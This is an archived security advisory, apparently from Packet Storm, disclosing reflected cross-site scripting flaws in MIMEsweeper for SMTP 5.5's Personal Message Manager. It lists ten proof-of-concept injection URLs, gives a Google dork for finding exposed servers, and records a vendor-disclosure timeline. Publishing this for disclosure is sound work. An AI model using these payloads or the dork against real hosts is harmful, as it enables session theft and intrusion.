Twenty Year Anniversary

MIMEsweeper For SMTP 5.5 Cross Site Scripting

MIMEsweeper For SMTP 5.5 Cross Site Scripting
Posted Feb 18, 2013
Authored by Anastasios Monachos

MIMEsweeper for SMTP version 5.5 Personal Message Manager suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | f4113c5756cdb31f358053c005e5696d

MIMEsweeper For SMTP 5.5 Cross Site Scripting

Change Mirror Download
Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
Vendor: Clearswift Ltd
Vendor URL: http://www.clearswift.com/
Category: Reflective XSS
Google dork: inurl:/MSWPMM/
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]

[Vulnerability Reproduction]
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>

[Time-line]
17/07/2009 - Initial discovery
13/01/2012 - Notified vendor
13/01/2012 - Vendor responded
16/01/2012 - Vendor requested more information
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
16/01/2012 - Informed vendor for evaluation progress, v5.5.0 is vulnerable too
17/01/2012 - Telephone conversation with vendor in regards the findings
17/01/2012 - Assigned vulnerability reference MSW-1459
25/01/2012 - Requested status update
25/01/2012 - Vendor replied "There is no update on MSW-1459."
16/02/2012 - Requested status update
26/02/2012 - Vendor replied "There is no update on MSW-1459."
23/03/2012 - Requested status update
23/03/2012 - Vendor replied "There is no update on MSW-1459."
09/05/2012 - Requested status update and gave a notice for public disclosure
11/05/2012 - Vendor replied "There is no update on MSW-1459."
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
07/06/2012 - Requested due to date for next release
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
13/06/2012 - We suggested to postpone the disclosure after the patch be public
06/12/2012 - Requested status update
06/12/2012 - Vendor sent details for patch
28/01/2013 - Patch is applicable for 5.5.1
09/02/2012 - We requested for demo license to verify fix
15/02/2013 - Vendor could not produce demo license for us to verify the fix
15/02/2013 - Vendor closes incident ticket
18/02/2013 - Public disclosure date

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    8 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close